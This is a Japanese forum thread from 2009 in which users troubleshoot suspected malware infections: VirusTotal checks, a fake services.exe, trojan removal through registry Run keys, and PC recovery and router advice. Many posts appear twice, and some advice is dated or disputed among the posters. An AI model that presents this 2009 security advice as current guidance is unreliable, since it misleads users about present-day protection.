【PCスペック】 『CPU: 1.6GHz 、メモリ: 756MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『IE6』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動更新』 例、自動更新設定
【セキュリティソフトと年式】 『バスター2009』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ADSL』 例、光回線でルータ使用中
『質問』
今は猛省してやってないのですが、winnyってあるじゃないですか。
あれを少しやってた時期がありましたが、CPU切り替え機を使用してやってました。
この場合危険性はあるのでしょうか?つまり2台パソコンがあり専用PCも用意されている状態です。
この状態で暴露ウイルスなどに感染しても個人情報はもれるんでしょうか?
ていうか、これで漏れたら誰でも漏らしてると思うんですが
594 :名無しさん@お腹いっぱい。:2009/03/21(土) 16:39:44
USBカメラについてたドライバいれたら、NODでウイルス反応が出たんですけど、
Nortonでは無反応でした。
どっちが正解なのか分からないのですが、調べる方法はありますか?
Nortonでは無反応でした。
どっちが正解なのか分からないのですが、調べる方法はありますか?
595 :名無しさん@お腹いっぱい。:2009/03/21(土) 22:03:11
>>594
virustotalに投げてみ。
http://www.virustotal.com/jp/
こんな感じで、色んなウイルス対策ソフトで判定してもらえる。
http://www.virustotal.com/analisis/0727323358fc1e8d963d8cc7f9c422c6
真性ウイルスだと複数(大抵5個以上)のソフトでウイルス判定される。
自分で判断できなかったら、スレに上記と同じようにアドレスを貼って、他の人にも意見を聞いてみる。
virustotalに投げてみ。
http://www.virustotal.com/jp/
こんな感じで、色んなウイルス対策ソフトで判定してもらえる。
http://www.virustotal.com/analisis/0727323358fc1e8d963d8cc7f9c422c6
真性ウイルスだと複数(大抵5個以上)のソフトでウイルス判定される。
自分で判断できなかったら、スレに上記と同じようにアドレスを貼って、他の人にも意見を聞いてみる。
596 :名無しさん@お腹いっぱい。:2009/03/21(土) 22:04:31
ありゃりゃ、被っちまったぃw
598 :名無しさん@お腹いっぱい。:2009/03/21(土) 22:14:32
以前使っていたけど、NODは誤検出が多いすね。提灯テスト結果と違って。
レスありがとう御座います。
さっそくやってみました。
以下の結果がでたのですが、これは黒ってことでしょうか?
http://www.virustotal.com/jp/analisis/780660f8f8a2d1bb6ccfaac06798d8fa
http://www.virustotal.com/jp/analisis/07330a21a32bbf32208b8e8f2bf648a4
さっそくやってみました。
以下の結果がでたのですが、これは黒ってことでしょうか?
http://www.virustotal.com/jp/analisis/780660f8f8a2d1bb6ccfaac06798d8fa
http://www.virustotal.com/jp/analisis/07330a21a32bbf32208b8e8f2bf648a4
>>599
これはかなり珍しいパターンだね。メジャー所がみんな取りこぼして(検知していない)、マイナー所が複数検知してる。
このパターンアド誤検出の可能性も残るが、俺はほぼ黒と見ました。
買ったばっかりの物にウイルスが入っていたのなら、念のためUSBカメラのメーカーにメールした方が良いかも。
(NODで検知したことと、virustotalのアドレスを貼り付けてメール)
あと、検出結果のページの日付が少し古いので、既に他の人が一度解析している。
最新の情報が欲しい時は、ファイルを送った後に、『ファイルの再解析』ボタン(右側)を押すと、
最新の解析結果がもらえるので、気になるなら再解析してからメールすると、なお良い。
これはかなり珍しいパターンだね。メジャー所がみんな取りこぼして(検知していない)、マイナー所が複数検知してる。
このパターンアド誤検出の可能性も残るが、俺はほぼ黒と見ました。
買ったばっかりの物にウイルスが入っていたのなら、念のためUSBカメラのメーカーにメールした方が良いかも。
(NODで検知したことと、virustotalのアドレスを貼り付けてメール)
あと、検出結果のページの日付が少し古いので、既に他の人が一度解析している。
最新の情報が欲しい時は、ファイルを送った後に、『ファイルの再解析』ボタン(右側)を押すと、
最新の解析結果がもらえるので、気になるなら再解析してからメールすると、なお良い。
602 :名無しさん@お腹いっぱい。:2009/03/22(日) 10:54:33
シマンテックの配付ファイルが原因でGoogleポインズニングにまで発展
http://antivirus-news.net/2009/03/googlesymantec.html
>この事件は、セキュリティベンダーの社会的責任が非常に重いことを意味するものと言えるだろう。
wwwwwwwwwwwwwwwwwwww
http://antivirus-news.net/2009/03/googlesymantec.html
>この事件は、セキュリティベンダーの社会的責任が非常に重いことを意味するものと言えるだろう。
wwwwwwwwwwwwwwwwwwww
603 :名無しさん@お腹いっぱい。:2009/03/22(日) 11:32:46
>ESET社(NOD32、ESS)のサイトが
>中華にクラックされウイルスを仕込まれた
>ttp://www.avertlabs.com/research/blog/index.php/2007/10/11/nod-to-more-arp-mayhem/
>(隠蔽しているのでMcAfeeブログより)
>
>公式サイトでウイルス貰えました。
セキュリティベンダーの公式サイトで、
ウイルス配布している所もあったしさ。orz
>中華にクラックされウイルスを仕込まれた
>ttp://www.avertlabs.com/research/blog/index.php/2007/10/11/nod-to-more-arp-mayhem/
>(隠蔽しているのでMcAfeeブログより)
>
>公式サイトでウイルス貰えました。
セキュリティベンダーの公式サイトで、
ウイルス配布している所もあったしさ。orz
604 :名無しさん@お腹いっぱい。:2009/03/23(月) 08:55:48
いきなりミッ○ーマ○スのテーマが流れだして1分位で止まった
とりあえず隠しファイル含めた履歴全部消してみたけど・・・
何のウィルスこれ?俺のパソコン大丈夫ですか?
とりあえず隠しファイル含めた履歴全部消してみたけど・・・
何のウィルスこれ?俺のパソコン大丈夫ですか?
605 :名無しさん@お腹いっぱい。:2009/03/23(月) 09:20:08
おそらくミッキーマウスマーチの音楽ファイルを再生しただけですよ。
問題ないです。
問題ないです。
606 :名無しさん@お腹いっぱい。:2009/03/23(月) 09:27:40
ソフトウェアの脆弱性を利用され、PCを遠隔操作された
その曲を指定した時間、又は何か特定の操作をしたら流すマルウェアに感染した
あなたがその曲をプレイヤ−に入れていて、何らかの操作により再生された
あなたの家族や友人が指定した時間、又は何か特定の操作をしたら流すように設定した
せめてテンプレくらい埋めてくれないとなんとも・・・
その曲を指定した時間、又は何か特定の操作をしたら流すマルウェアに感染した
あなたがその曲をプレイヤ−に入れていて、何らかの操作により再生された
あなたの家族や友人が指定した時間、又は何か特定の操作をしたら流すように設定した
せめてテンプレくらい埋めてくれないとなんとも・・・
607 :名無しさん@お腹いっぱい。:2009/03/24(火) 03:46:21
HDDの中の画像ファイルを検索して破壊するようなウィルスはありますか?
608 :名無しさん@お腹いっぱい。:2009/03/24(火) 04:01:59
609 :名無しさん@お腹いっぱい。:2009/03/24(火) 11:36:46
端末が100台程ある社内LAN環境で、Windows Severの脆弱性を悪用したウィルスに感染したマシンが発生し、一気にウィルスが広まりました。
LANは外部とは一切繋がっておらず、恐らくUSBメモリから感染したと思われます。
USBメモリは決まった物しか使用してはならない決まりですが、個人持ちも使おうと思えば使えます。
が、誰も自分が使ったとは言いません。
OSはWin2000、スキャンソフトはMcAfee、パターンファイルは一部のマシンがまったくアップデートしておらず、
MSから出しているOSの脆弱絡みのパッチは一切適用していない環境です。
パターンファイルが適用されているマシンは、バッファオーバーフローを検知し、怪しげなbatファイルの実行も検知しました。
フルスキャンをかけるとSYSTEM32下の一部EXEがウィルスに感染していました。
パターンファイルが適用されていないマシンは感染ファイルをばらまき、OSの脆弱を利用したアタックを他のマシンにかけていました。
長々と書きましたが、感染源(PC)を特定する良い方法などありますでしょうか?
皆さんのお知恵を貸して下さい。
LANは外部とは一切繋がっておらず、恐らくUSBメモリから感染したと思われます。
USBメモリは決まった物しか使用してはならない決まりですが、個人持ちも使おうと思えば使えます。
が、誰も自分が使ったとは言いません。
OSはWin2000、スキャンソフトはMcAfee、パターンファイルは一部のマシンがまったくアップデートしておらず、
MSから出しているOSの脆弱絡みのパッチは一切適用していない環境です。
パターンファイルが適用されているマシンは、バッファオーバーフローを検知し、怪しげなbatファイルの実行も検知しました。
フルスキャンをかけるとSYSTEM32下の一部EXEがウィルスに感染していました。
パターンファイルが適用されていないマシンは感染ファイルをばらまき、OSの脆弱を利用したアタックを他のマシンにかけていました。
長々と書きましたが、感染源(PC)を特定する良い方法などありますでしょうか?
皆さんのお知恵を貸して下さい。
610 : ◆N9P3SuvBPo :2009/03/24(火) 23:38:23
>609
特定とかより、感染しているPCに入ってる重要なデータを退避させて
クリーンインストールを行なうことを奨めます。
企業では特定するより、被害の拡大を如何に早く食い止め、如何に早く復旧できるかの問題ですからね。
特定とかより、感染しているPCに入ってる重要なデータを退避させて
クリーンインストールを行なうことを奨めます。
企業では特定するより、被害の拡大を如何に早く食い止め、如何に早く復旧できるかの問題ですからね。
612 :名無しさん@お腹いっぱい。:2009/03/26(木) 10:11:16
世間は本当に不況なんだよなぁ。
幸い俺の所は不況知らずで、最近も20人程外向さんを雇ったんだけど
いつもは面接で顔を見た瞬間駄目だというやつが多かったが
今回はまともな人間がすぐに揃ったよ
幸い俺の所は不況知らずで、最近も20人程外向さんを雇ったんだけど
いつもは面接で顔を見た瞬間駄目だというやつが多かったが
今回はまともな人間がすぐに揃ったよ
613 :名無しさん@お腹いっぱい。:2009/03/26(木) 10:12:22
すいません。間違えました。
614 :名無しさん@お腹いっぱい。:2009/03/28(土) 02:35:28
・パソコン起動するたびにMicrosoftUpdateの自動更新がオフにされている。
・Micorosoft、トレンドマイクロ、シマンテックなどの公式サイトがブラウザで見れない。
このような影響のあるウィルスってありますか?
これってやっぱりウィルスのせいなんでしょうか・・・
・Micorosoft、トレンドマイクロ、シマンテックなどの公式サイトがブラウザで見れない。
このような影響のあるウィルスってありますか?
これってやっぱりウィルスのせいなんでしょうか・・・
615 :名無しさん@お腹いっぱい。:2009/03/28(土) 05:21:23
マルウエアだと思うよ
616 :名無しさん@お腹いっぱい。:2009/03/28(土) 09:17:24
特定のホームページが読み込みエラーになるようなウィルスっていますか?
試したところ、
・マイクロソフト
・シマンテック
・トレンドマイクロ
は読み込みエラーになってしまいます。
以前は見れていました。他のHPは表示できています。
試したところ、
・マイクロソフト
・シマンテック
・トレンドマイクロ
は読み込みエラーになってしまいます。
以前は見れていました。他のHPは表示できています。
617 :名無しさん@お腹いっぱい。:2009/03/28(土) 09:20:37
【使用OS】 Vista
【Microsoft Update(MU)の状態】 してます
【使用セキュリティソフトとバージョン】 avast最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Widowa Defender
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
スタートアップに services.exe が登録されていました。製造元は不明と表示されています。
コマンドは、C:\Users\******r\AppData\Local\services.exe
(正規のservices.exeはsystem32フォルダにあると聞きました)
タスマネから見ると、ユーザー名がsystemで説明が「サービスとコントローラアプリケーション」と書いてあるservices.exe
ともうひとつ
怪しいと思っている、services.exeがあります。
それが、ユーザー名****** 説明は、「services.exe」です。
2種類ありました。片方は正規?のsystem32関連だと思われるのですが
もうひとつがわかりません。ググるとマルウェア?ウイルス?など
あまり良いことは書いてありませんでしたので、質問にきました。
【Microsoft Update(MU)の状態】 してます
【使用セキュリティソフトとバージョン】 avast最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Widowa Defender
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
スタートアップに services.exe が登録されていました。製造元は不明と表示されています。
コマンドは、C:\Users\******r\AppData\Local\services.exe
(正規のservices.exeはsystem32フォルダにあると聞きました)
タスマネから見ると、ユーザー名がsystemで説明が「サービスとコントローラアプリケーション」と書いてあるservices.exe
ともうひとつ
怪しいと思っている、services.exeがあります。
それが、ユーザー名****** 説明は、「services.exe」です。
2種類ありました。片方は正規?のsystem32関連だと思われるのですが
もうひとつがわかりません。ググるとマルウェア?ウイルス?など
あまり良いことは書いてありませんでしたので、質問にきました。
618 :名無しさん@お腹いっぱい。:2009/03/30(月) 22:19:16
>>617
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-011616-5036-99&tabid=2
これだと思いますが、どうでしょう?
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-011616-5036-99&tabid=2
これだと思いますが、どうでしょう?
619 :名無しさん@お腹いっぱい。:2009/03/31(火) 06:33:27
620 :名無しさん@お腹いっぱい。:2009/03/31(火) 06:49:20
もしかして、マイクロソフトのサイトも表示できなかったり?
だとしたらリカバリしかない。そういうウィルスだから
だとしたらリカバリしかない。そういうウィルスだから
621 :名無しさん@お腹いっぱい。:2009/03/31(火) 12:56:07
マイクロソフトも表示できないです。
とりあえずOS入れ直す方向で考えて見ます。
情報ありがとうです。
とりあえずOS入れ直す方向で考えて見ます。
情報ありがとうです。
622 :名無しさん@お腹いっぱい。:2009/03/31(火) 22:45:38
>>619
>でもシマンテックのHPが見れないので
あ、ごめんね。
えーっとHPより抜粋するに
1. セーフモードで起動して
2. 該当のファイルを削除して
3. 下記のレジストリを消せば大丈夫だと思われます
HKEY_CURRENT_USER¥Software¥Microsoft¥Windows¥CurrentVersion¥Run¥"[ランダムな名前]" = "[トロイの木馬へのパス]"
注意: [ランダムな名前] は、次のリストから得られてます。
CrashDump
EventLog
Init
lsass
Regscan
RunDll
Setup
Sound
svchosts
System
TaskMon
UPNP
Windows
がんばって!
>でもシマンテックのHPが見れないので
あ、ごめんね。
えーっとHPより抜粋するに
1. セーフモードで起動して
2. 該当のファイルを削除して
3. 下記のレジストリを消せば大丈夫だと思われます
HKEY_CURRENT_USER¥Software¥Microsoft¥Windows¥CurrentVersion¥Run¥"[ランダムな名前]" = "[トロイの木馬へのパス]"
注意: [ランダムな名前] は、次のリストから得られてます。
CrashDump
EventLog
Init
lsass
Regscan
RunDll
Setup
Sound
svchosts
System
TaskMon
UPNP
Windows
がんばって!
623 :名無しさん@お腹いっぱい。:2009/04/01(水) 00:19:14
624 :名無しさん@お腹いっぱい。:2009/04/01(水) 01:05:40
レジストリ修復?
平たく言うと?
リンク切れのことか?
平たく言うと?
リンク切れのことか?
625 :名無しさん@お腹いっぱい。:2009/04/01(水) 02:00:30
つか、セキュリティーソフトのベンダーに繋がらないのってマルウエアの症状そのものじゃん。
SUPEPAntispywareを使うといいよ。
CCCクリーナーも意外に頑張ってくれるから(完治ではないが多少は緩和する)試してみるといいかも。
SUPEPAntispywareを使うといいよ。
CCCクリーナーも意外に頑張ってくれるから(完治ではないが多少は緩和する)試してみるといいかも。
626 :名無しさん@お腹いっぱい。:2009/04/02(木) 00:26:19
リカバリについて教えてください。
パソコン購入時に付いてきたCD-ROM 2枚あるのですが
マイクロソフト オフィス パーソナル エディション 2003
というのはリカバリディスクではないのでしょうか?
ウイルスに感染しているのが確実なようでウイルスのサイトは表示されません。
取説を読むとリカバリディスクは付いていないと書いてあります。
リカバリ手順は調べたのですがディスクは?というところで止まってしまいました。
よろしくお願いいたします。
パソコン購入時に付いてきたCD-ROM 2枚あるのですが
マイクロソフト オフィス パーソナル エディション 2003
というのはリカバリディスクではないのでしょうか?
ウイルスに感染しているのが確実なようでウイルスのサイトは表示されません。
取説を読むとリカバリディスクは付いていないと書いてあります。
リカバリ手順は調べたのですがディスクは?というところで止まってしまいました。
よろしくお願いいたします。
627 :名無しさん@お腹いっぱい。:2009/04/02(木) 00:37:59
すまない「取説」あるんだ。
それにリカバリ方法がないのなら
他の冊子に乗っているかと。
付属本は(2〜3)冊あると思うよ。
それにリカバリ方法がないのなら
他の冊子に乗っているかと。
付属本は(2〜3)冊あると思うよ。
629 :名無しさん@お腹いっぱい。:2009/04/02(木) 01:04:07
>>626です
ありがとうございます。
SONYのVAIO
PCV-W702B/W502B
です。
かなり前、Win95や98の頃リカバリはやったことがあるのですが…今回はXPでさらに感染が確実なようでウイルス対策をしていなかったことを後悔しています。
ありがとうございます。
SONYのVAIO
PCV-W702B/W502B
です。
かなり前、Win95や98の頃リカバリはやったことがあるのですが…今回はXPでさらに感染が確実なようでウイルス対策をしていなかったことを後悔しています。
つttp://dlv.update.sony.net/pub/vaio/download/man/4682290011.pdf
"リカバリディスク作成/リカバリ"参照して
"リカバリディスク作成/リカバリ"参照して
631 :名無しさん@お腹いっぱい。:2009/04/02(木) 01:18:14
>>626です
取説にリカバリディスクを入れると書いてあるのですが
リカバリディスクの存在が不明!?なのです。
購入時に付いていたものは全部とっておいているはずなのですが
取説によると付属のCDは先の2枚のようで、リカバリディスクは
使用前に自分で作るか有償と書いてあります。
自分では作成しておらず、オンラインのユーザー登録も
していませんでした。昔と違ってリカバリディスクというのは
付属ではないということなのでしょうか?
取説にリカバリディスクを入れると書いてあるのですが
リカバリディスクの存在が不明!?なのです。
購入時に付いていたものは全部とっておいているはずなのですが
取説によると付属のCDは先の2枚のようで、リカバリディスクは
使用前に自分で作るか有償と書いてあります。
自分では作成しておらず、オンラインのユーザー登録も
していませんでした。昔と違ってリカバリディスクというのは
付属ではないということなのでしょうか?
632 :名無しさん@お腹いっぱい。:2009/04/02(木) 01:28:14
>>630様
>>626です
教えて頂きありがとうございます。
携帯から見ようとしたのですが容量が大きく見れないようです。
後でパソコンで見られたら良いのですが全体的に
調子が悪く見られるかわかりません。
また結果をご報告させていただきますね。
遅い時間にありがとうございます。
>>626です
教えて頂きありがとうございます。
携帯から見ようとしたのですが容量が大きく見れないようです。
後でパソコンで見られたら良いのですが全体的に
調子が悪く見られるかわかりません。
また結果をご報告させていただきますね。
遅い時間にありがとうございます。
先に示したリンク先の180ページ"C:ドライブのリカバリ"を実行したあとに
セキュリティソフトインストール>Office等インストール>Windoes Update
>Dドライブ以降のフルスキャン
"Dドライブ以降のフルスキャン"これ大事。
リカバリディスクの作成方法もリンク先に載っているね。今回は上記の方法で再セットアップ
したあとでリカバリディスクの作成をしておこう。
セキュリティソフトインストール>Office等インストール>Windoes Update
>Dドライブ以降のフルスキャン
"Dドライブ以降のフルスキャン"これ大事。
リカバリディスクの作成方法もリンク先に載っているね。今回は上記の方法で再セットアップ
したあとでリカバリディスクの作成をしておこう。
634 :名無しさん@お腹いっぱい。:2009/04/02(木) 01:38:46
見られないのか…
ディスクを作成していないとOSを立ち上げた状態からリカバリするしかないみたいだ。
スタート>すべてのプログラム>VAIOリカバリツール>VAIOリカバリユーティリティ
後は"OK"とか"次"をクリックしていけばOK
ディスクを作成していないとOSを立ち上げた状態からリカバリするしかないみたいだ。
スタート>すべてのプログラム>VAIOリカバリツール>VAIOリカバリユーティリティ
後は"OK"とか"次"をクリックしていけばOK
そうそう、ルータがない場合セキュリティソフト(PFW付き)をインストールするまでは
絶対にネットにつないではいけないよ。
絶対にネットにつないではいけないよ。
637 :名無しさん@お腹いっぱい。:2009/04/02(木) 02:39:48
http://www.alpha-net.ne.jp/users2/knight9/m.htm
このアドレスは無限回廊って犯罪の有名なデータベースサイトなんだけど、
自分のパソコンじゃ反応しないのに知り合いのパソコンはウィルスに反応したって言われた
これってどうなのか教えて下さい
【使用OS】 winXp
【Microsoft Update(MU)の状態】 自動にしてる
【使用セキュリティソフトとバージョン】 avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
【ルータの有無】 有
このアドレスは無限回廊って犯罪の有名なデータベースサイトなんだけど、
自分のパソコンじゃ反応しないのに知り合いのパソコンはウィルスに反応したって言われた
これってどうなのか教えて下さい
【使用OS】 winXp
【Microsoft Update(MU)の状態】 自動にしてる
【使用セキュリティソフトとバージョン】 avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
【ルータの有無】 有
638 :名無しさん@お腹いっぱい。:2009/04/02(木) 09:12:42
一通り回ってきたけど、Aviraでは無反応。
どこで反応したかは分かる?
どこで反応したかは分かる?
639 :名無しさん@お腹いっぱい。:2009/04/02(木) 13:41:41
ウィルスバスタ2009で検索かけてみたらウィルス発見しました
2つあって名前はそれぞれVBS PSYME.CTEとHTML WEBKIT.AIというみたいなんですが
処理状況が「対処できないウイルスに感染したファイルが、感染の拡大を防ぐために隔離されました。」と出ていて
これはつまり完全には駆除してませんよ。という意味で、まだPC内に存在しているということでそゆか
もしそうなら処理方法を教えてほしいです
2つあって名前はそれぞれVBS PSYME.CTEとHTML WEBKIT.AIというみたいなんですが
処理状況が「対処できないウイルスに感染したファイルが、感染の拡大を防ぐために隔離されました。」と出ていて
これはつまり完全には駆除してませんよ。という意味で、まだPC内に存在しているということでそゆか
もしそうなら処理方法を教えてほしいです
640 :名無しさん@お腹いっぱい。:2009/04/02(木) 14:51:09
>>639
その手のマルウエアはリアルタイム検索で(サイトを開いたとき)
検出されるのが普通で、windoes update やflash player等の脆弱性がなければ感染しない。
今回検出されたファイルはウイルスそのものなので駆除(正常なファイルに戻す)ことはできない。
隔離されたファイルを削除すればよい。(その後、念のためフルスキャン)
VB2009は使用したことがないので操作手順はわからないが、右下のバスターアイコン(カプセルマーク)から
操作設定画面をたちあげて処理することになる。
昔のバージョンと同じなら隔離されたファイルはこの中にある。
C:\Program Files\Trend Micro\Virus Buster 2009\Quarantine
正規ユーザーなら、本家のヘルプ見てもわからない場合サポートも含めた料金を払っているのだからサポートに聞きなさいよと。
その手のマルウエアはリアルタイム検索で(サイトを開いたとき)
検出されるのが普通で、windoes update やflash player等の脆弱性がなければ感染しない。
今回検出されたファイルはウイルスそのものなので駆除(正常なファイルに戻す)ことはできない。
隔離されたファイルを削除すればよい。(その後、念のためフルスキャン)
VB2009は使用したことがないので操作手順はわからないが、右下のバスターアイコン(カプセルマーク)から
操作設定画面をたちあげて処理することになる。
昔のバージョンと同じなら隔離されたファイルはこの中にある。
C:\Program Files\Trend Micro\Virus Buster 2009\Quarantine
正規ユーザーなら、本家のヘルプ見てもわからない場合サポートも含めた料金を払っているのだからサポートに聞きなさいよと。
641 :名無しさん@お腹いっぱい。:2009/04/02(木) 15:18:32
PC買ったときについてきたバスタ2008を入れたら
入れる前と比べてかなり重くてアンインスコ
その後何も入れてないんだが何か入れたほうがいいだろうか?
ブラウザはfirefoxでWindows Defenderがある
ごくたまにWindows Live OneCare PC セーフティで(これはIE
スキャンするも毎回感染なし
入れる前と比べてかなり重くてアンインスコ
その後何も入れてないんだが何か入れたほうがいいだろうか?
ブラウザはfirefoxでWindows Defenderがある
ごくたまにWindows Live OneCare PC セーフティで(これはIE
スキャンするも毎回感染なし
642 :名無しさん@お腹いっぱい。:2009/04/02(木) 15:30:31
お前がそれでいいんならいいなじゃないの?
アンチウイルスの常駐とFWは最低限入れろっても、どうせ重くなるっていいだすだろうしな。
アンチウイルスの常駐とFWは最低限入れろっても、どうせ重くなるっていいだすだろうしな。
643 :名無しさん@お腹いっぱい。:2009/04/02(木) 15:34:47
FWはネトゲする時以外はすべての着信接続をブロックにするにしてる
644 :名無しさん@お腹いっぱい。:2009/04/02(木) 15:58:31
645 :名無しさん@お腹いっぱい。:2009/04/02(木) 16:30:15
Hotmailを今日チェックしようと思ってIEで開いたらクッキーに残してあったアドレスが全然違うものになってました
babbあっとxx.しーおー.jpになってたんですがこれってウイルスか何かですか?
アドレスはもちろん全部半角英数だったんですが「xx」ってなってるのが気になって
ググってもわかりませんでした
babbあっとxx.しーおー.jpになってたんですがこれってウイルスか何かですか?
アドレスはもちろん全部半角英数だったんですが「xx」ってなってるのが気になって
ググってもわかりませんでした
>>627様
>>630の手順でセキュリティソフトのインストールまできましたが
続きができません。
リカバリ前に無料のオンラインスキャンもサイトが表示されないので
ウイルスバスター2009を買ってきたのですが、ソフトを入れたら
ウイルスバスター2009インストーラ
セットアッププログラムは、必要なサービスパック
がこのコンピュータのウィンドウズXPに適用されていないことを
検出しました。
【ウィンドウズアップデートの実行】を
クリックして、サービスパックをダウンロードしてください。
と出ています。リカバリ前には、それでもアップデートしようと
しましたが、やはり表示されませんでした。
ウイルスをスキャンや駆除しようとするのを妨害するかのように…。
先程、Cドライブをリカバリ→
(取説の流れで)Office等インストール→ウイルスバスターの
ソフトを入れたら上記のように出ました。
まだネットに繋いではいけないのにアップデートをしなければ
いけないということですよね?
ここでまた止まってしまいました。(泣)
光で1台しかなく困っています。
また教えていただけましたら助かります。
よろしくお願いいたします。
>>630の手順でセキュリティソフトのインストールまできましたが
続きができません。
リカバリ前に無料のオンラインスキャンもサイトが表示されないので
ウイルスバスター2009を買ってきたのですが、ソフトを入れたら
ウイルスバスター2009インストーラ
セットアッププログラムは、必要なサービスパック
がこのコンピュータのウィンドウズXPに適用されていないことを
検出しました。
【ウィンドウズアップデートの実行】を
クリックして、サービスパックをダウンロードしてください。
と出ています。リカバリ前には、それでもアップデートしようと
しましたが、やはり表示されませんでした。
ウイルスをスキャンや駆除しようとするのを妨害するかのように…。
先程、Cドライブをリカバリ→
(取説の流れで)Office等インストール→ウイルスバスターの
ソフトを入れたら上記のように出ました。
まだネットに繋いではいけないのにアップデートをしなければ
いけないということですよね?
ここでまた止まってしまいました。(泣)
光で1台しかなく困っています。
また教えていただけましたら助かります。
よろしくお願いいたします。
647 :名無しさん@お腹いっぱい。:2009/04/02(木) 18:37:43
一回ネットに繋いでSP2なり3なり適用すりゃいいじゃん
バスターなんか買ってる時点で終わってるけど・・・
バスターなんか買ってる時点で終わってるけど・・・
648 :名無しさん@お腹いっぱい。:2009/04/02(木) 18:39:36
光でルータ無いの?
ルータが有ればネットに接続しても大丈夫だよ。
ルータが有ればネットに接続しても大丈夫だよ。
バスター2009の作動条件がSP2以降等のためインストールできないのでしょう。
一番良いのはnecとかbuffaloの"ブロードバンドルータ"を購入することなのですが…
バンドルされているノートンとかバスターの試用版があると仮定して話をすすめます。
試用版(PFW付が条件)をインストール>windoes update>試用版アンインストール
(通常のアンインストール後、ノートンの場合専用のアンインストーラをシマンテックのサイトから
落として実行)>バスター2009インストール
ノートン・アンインストーラー
ttp://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jp_docid/20050415150354953
一番良いのはnecとかbuffaloの"ブロードバンドルータ"を購入することなのですが…
バンドルされているノートンとかバスターの試用版があると仮定して話をすすめます。
試用版(PFW付が条件)をインストール>windoes update>試用版アンインストール
(通常のアンインストール後、ノートンの場合専用のアンインストーラをシマンテックのサイトから
落として実行)>バスター2009インストール
ノートン・アンインストーラー
ttp://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jp_docid/20050415150354953
650 :名無しさん@お腹いっぱい。:2009/04/02(木) 20:46:14
クリーンインスコしたんならうpだての間ノーガードでもたいして問題ねーだろ
651 : ◆N9P3SuvBPo :2009/04/02(木) 21:32:27
>650
本気で言ってるんですか?
ルータ無しでSP2以前のXPや2000でネットに繋いだら数分で終わるぞ。
ネットサーフィンしなくても勝手に入ってくるから。
本気で言ってるんですか?
ルータ無しでSP2以前のXPや2000でネットに繋いだら数分で終わるぞ。
ネットサーフィンしなくても勝手に入ってくるから。
652 :名無しさん@お腹いっぱい。:2009/04/02(木) 21:34:11
アホかw
その後すぐバスター入れてフルスキャンするんだろーがw
その後すぐバスター入れてフルスキャンするんだろーがw
653 :名無しさん@お腹いっぱい。:2009/04/02(木) 21:45:51
感染してからセキュリティソフト入れたって無意味っすよ
654 :名無しさん@お腹いっぱい。:2009/04/02(木) 21:48:17
なんのためのクリーンインストールやらw
655 : ◆N9P3SuvBPo :2009/04/02(木) 22:00:31
>>649
もう一回リカバリ作業が必要になりますが、このサイトからSP2インストールCDを入手してください。
ttp://www.microsoft.com/japan/windowsxp/sp2/default.mspx
注文方法はどっちでも構いませんが、お奨めはFAXによる注文ですかね…
CDが届いたらリカバリしてSP2をインストール、バスター2009インストール、WindowsUpdateという手順を踏んではどうですか?
もう一回リカバリ作業が必要になりますが、このサイトからSP2インストールCDを入手してください。
ttp://www.microsoft.com/japan/windowsxp/sp2/default.mspx
注文方法はどっちでも構いませんが、お奨めはFAXによる注文ですかね…
CDが届いたらリカバリしてSP2をインストール、バスター2009インストール、WindowsUpdateという手順を踏んではどうですか?
657 : ◆N9P3SuvBPo :2009/04/02(木) 22:19:54
>656
うぎゃあ!!
質問者の方と勘違いしてしまいました…
うぎゃあ!!
質問者の方と勘違いしてしまいました…
>>627様
>>655様
ありがとうございます。
ウイルス対策やアップデートもせずにいたことを反省しています。
オンラインで何もできないのなら製品版しかないのかと思いまして
購入しましたが一人では解決できず、またパソコンはそれしかないので
調べることもできません。教えて頂きまして本当に助かります。
プロバイダは感染の可能性を教えてくれるまでですし、
皆さんはバスターなんてと書いておられましたが量販店では
オススメとのこと…。
パソコンメーカーに聞けば?とも言われたりしたのですが
オンラインのユーザー登録もしていなかったので繋げない今は
ここで親切に教えていただけてとても嬉しいです。
ルータは使ったことがないのですが先にあげていただいたのが
オススメなのでしょうか?
光で今後も1台のみ利用の予定です。
よろしくお願いいたします。
>>655様
ありがとうございます。
ウイルス対策やアップデートもせずにいたことを反省しています。
オンラインで何もできないのなら製品版しかないのかと思いまして
購入しましたが一人では解決できず、またパソコンはそれしかないので
調べることもできません。教えて頂きまして本当に助かります。
プロバイダは感染の可能性を教えてくれるまでですし、
皆さんはバスターなんてと書いておられましたが量販店では
オススメとのこと…。
パソコンメーカーに聞けば?とも言われたりしたのですが
オンラインのユーザー登録もしていなかったので繋げない今は
ここで親切に教えていただけてとても嬉しいです。
ルータは使ったことがないのですが先にあげていただいたのが
オススメなのでしょうか?
光で今後も1台のみ利用の予定です。
よろしくお願いいたします。
>>658
私見ですが"お店のお勧め"="良い製品"とは限りません。
"お店のお勧め"="捌きたい製品"のときもあります。
上記はバスターを批判しているわけではありません。すべての商品に対しての私見です。
最近のセキュリティソフトはそれなりにメモリを積んでいないと辛いです。
XPなら最低512Mはほしいですね。
ネットでの製品情報も(個人のブログ含め)さくらの書き込みがないとはいえないことも念頭に入れてください。
その上で価格コムの有線ルーター 満足度ランキング(10000円以下)を5位までかいておきます。
満足度5.00が満点
2004年 7月下旬発売 バッファロー BHR-4RV 最安値:\7,216 満足度4.72 採点人数5人 口コミ件数 347件
2007年 8月下旬発売 IODATA ETX-R 最安値:\2,370 満足度4.12 採点人数17人 口コミ件数 309件
2003年10月下旬発売 バッファロー BBR-4HG 最安値:\4,329 満足度3.58 9人 口コミ件数 3061件
